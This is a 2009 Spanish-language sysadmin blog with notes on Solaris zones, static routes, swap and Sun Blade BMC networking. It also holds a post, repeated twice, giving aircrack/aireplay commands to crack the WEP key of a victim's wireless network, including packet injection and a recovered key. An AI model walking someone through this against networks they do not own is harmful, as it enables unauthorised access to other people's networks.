viernes, 31 de julio de 2009
Creación de Zonas - Solaris
set zonepath=/zonas/CT1BOZSUNOAS-SPE4
set autoboot=true
set ip-type=exclusive
add net
set physical=nxge1
set physical=nxge2
end
verify
commit
miércoles, 29 de julio de 2009
Como hackear clave WEP en red inalambrica - Wifislax
wifislax->Asistencia chipset->Asistencia Intel pro wireless-> Cargar ipw3945 inyeccion – ipwraw-ng.
NOTA: con este comando configuramos tambien la interfas en modo monitor
#airmon-ng start wifi0 6
2.#iwconfig , para revisar la configuracion en la que quedo la interfaz de red en este caso la interfaz de red se llama wifi0.
3.Configuramos la velocidad de transmision a 1MB para evitar problemas de transmision
#iwconfig wifi0 rate 1M
4.Despues de haber identificado que la interfaz halla quedado en modo monitor, empezaremos a detectar redes por el canal 6. Para esto utilizamos el siguiente comando:
#airodump-ng -w aaaa -c6 wifi0
donde aaaa puede ser cualquier archivo.
NOTA: tambien se puede hacer de la siguiente manera:
wifislax-> Herramientas wireless -> Kismet .
Seguidamente aparecera una ventana (Lanzador kismet) para configurar cual es la interfaz de red:
Dispositivo: wifi0
Driver: ipw2915
Nombre: wifislax
En este ejemploencontramos una ESSID: LD, BSSID: 00:24:01:24:AD:FF, ENCHRIPTER: WEB, CHANNEL: 6
5.Seguidamente despues de haber escogido la red con encriptacion wep que vamos a atacar, ejecutamos el siguiente comando:
#aireplay -1 0 -e ESSID -a MAC_ROUTER_VICTIMA - h MAC_DE_MI_TARJETA wifi0
#aireplay -1 0 -e LD -a 00:24:01:24:AD:FF - h 00:1B:77:DA:99:3B wifi0
En este paso nuestra maquina tiene que engancharse con el router victima, apareciendo el siguiente mensaje despues de haber dado enter en el comando mensionado:
…...
Enviando peticion de autentificacion
Autentificacion conseguida
Enviando peticion de asociacion
Asociacion conseguida
6.Ahora empezaremmos a inyectar paquetes usando el siguiente comando:
#aireplay-ng -3 -x600 -b MAC_ROUTER_VICTIMA - h MAC_DE_MI_TARJETA wifi0
#aireplay-ng -3 -x600 -b 00:24:01:24:AD:FF - h 00:1B:77:DA:99:3B wifi0
Ahora se comenzaran a enviar paquetes. Debemos esperar a que se envien un poco mas de 100.000 paquetes.
7.Logrando la cantidad de paquetes indicado procedemos a encontrar la clave. Para esto haremos uso del siguiente comando:
#aircrack-ptw LD-01.cap
Este archivo se genera automaticamente con el nombre del ESSID en el directorio raiz.
Este comando me entregara la clave tanto en exadecimal como en su equivalente ASCII:
….
Equivalente en ASCII: LADINO4763356
Como hackear clave WEP en red inalambrica - Wifislax
wifislax->Asistencia chipset->Asistencia Intel pro wireless-> Cargar ipw3945 inyeccion – ipwraw-ng
NOTA: con este comando configuramos tambien la interfas en modo monitor
#airmon-ng start wifi0 6
2. #iwconfig, para revisar la configuracion en la que quedó la interfaz de red, en este caso la interfaz de red se llama wifi0.
3. Configuramos la velocidad de transmisión a 1MB para evitar problemas de transmisión.
#iwconfig wifi0 rate 1M
4. Desues de haber identificado que la interfaz halla quedado en modo monitor, empezaremos a detectar las redes que se encuentren en el canal 6 por el cual nuestra interfaz esta escuchando. Para esto utilizamos el siguiente comando:
#airodump-ng -w aaaa -c6 wifi0
donde aaaa puede ser cualquier nombre para este archivo.
wifislax-> Herramientas wireless -> Kismet .
Seguidamente aparecera una ventana (Lanzador kismet) para configurar cual es la interfaz de red:
Dispositivo: wifi0
Driver: ipw2915
Nombre: wifislax
En este ejemplo encontramos una ESSID:LD, BSSID:
5. Seguidamente despues de haber escogido la red con encriptacino WEP que vamos a atacar, ejecutamos el siguiente comando:
#aireplay -1 0 -e ESSID -a MAC_ROUTER_VICTIMA - h MAC_DE_MI_TARJETA wifi0
#aireplay -1 0 -e LD -a 00:24:01:24:AD:FF - h 00:1B:77:DA:99:3B wifi0
En este paso nuestra maquina tiene que engancharse con el router victima, apareciendo el siguiente mensaje despues de haber dado enter en el comando mensionado:
…...
Enviando peticion de autentificacion
Autentificacion conseguida
Enviando peticion de asociacion
Asociacion conseguida
6. Ahora empezaremos a intectar paquetes usando el siguiente comando:
#aireplay-ng -3 -x600 -b MAC_ROUTER_VICTIMA - h MAC_DE_MI_TARJETA wifi0
#aireplay-ng -3 -x600 -b 00:24:01:24:AD:FF - h 00:1B:77:DA:99:3B wifi0
Ahora se comenzaran a enviar paquetes. Debemos esperar a que se envien un poco mas de 100.000 paquetes.
7. Logrando la cantidad de paquetes indicado procederemos a encontrar la clave. Para esto haremos uso del siguiente comando:
#aircrack-ptw LD-01.cap
Este archivo se genera automaticamente con el nombre del ESSID en el directorio raiz. Este comando me entrega la clave tanto en exadecimal como en su equivalente ASCII.
.....
Equivalente en ASCII: LADINO4763356
lunes, 27 de julio de 2009
Configuracion Interfaz BMC Sun Blade 6250
-> set /CH/BL9/SP/network pendingipaddress=172.28.236.29
-> set /CH/BL9/SP/network pendingipdiscovery=static
-> set /CH/BL9/SP/network pendingipgateway=172.28.239.254
-> set /CH/BL9/SP/network pendingipnetmask=255.255.252.0
-> set /CH/BL9/SP/network commitpending=true
//Muestra la configuracion de Red para esa blade
-> show /CH/BL9/SP/network
viernes, 10 de julio de 2009
Agregar rutas estaticas - Solaris
# netstat -rn
Routing Table: IPv4
Destination Gateway Flags Ref Use Interface
-------------------- -------------------- ----- ----- ------ ---------
172.28.250.98 172.28.250.98 UGH 1 0
172.28.250.99 172.28.250.99 UGH 1 0
172.28.250.97 172.28.250.97 UGH 1 481
172.28.250.100 172.28.250.100 UGH 1 272
172.28.250.101 172.28.250.101 UGH 1 3
172.20.45.231 172.20.45.231 UGH 1 0
172.20.45.230 172.20.45.230 UGH 1 0
192.168.100.0 192.168.100.1 U 1 0 bge853000:1
140.126.65.0 140.126.65.1 U 1 0 bge45000:1
172.16.150.0 172.28.249.254 UG 1 3
172.20.45.0 172.20.45.14 U 1 30197 bge45000:2
172.20.45.0 172.20.45.14 U 1 0 bge45000
172.20.45.0 172.20.45.14 U 1 6692 bge45001
172.28.248.0 172.28.250.94 U 1 198287 bge853000:2
172.28.248.0 172.28.250.94 U 1 0 bge853000
172.28.248.0 172.28.250.94 U 1 10591 bge853001
172.28.0.0 172.28.251.254 UG 1 12905
224.0.0.0 172.28.250.94 U 1 0 bge853000:2
default 172.20.45.250 UG 1 5985
127.0.0.1 127.0.0.1 UH 7626145638 lo0
//Agregando una ruta para acceder a una red
# route add net 192.168.16.0 10.0.2.15 //Para acceder a la red 192.168.16.0, lo voy a hacer desde la gateway 10.0.2.15
//Removiendo una ruta para acceder a una red
# route delete net 192.168.16.0 10.0.2.15
viernes, 3 de julio de 2009
Como Agregar tamaño a la Swap - Solaris
#swap -a /opt/swapfile //Con esto estoy habilitando el archivo creado para que se adhiera a la swap actual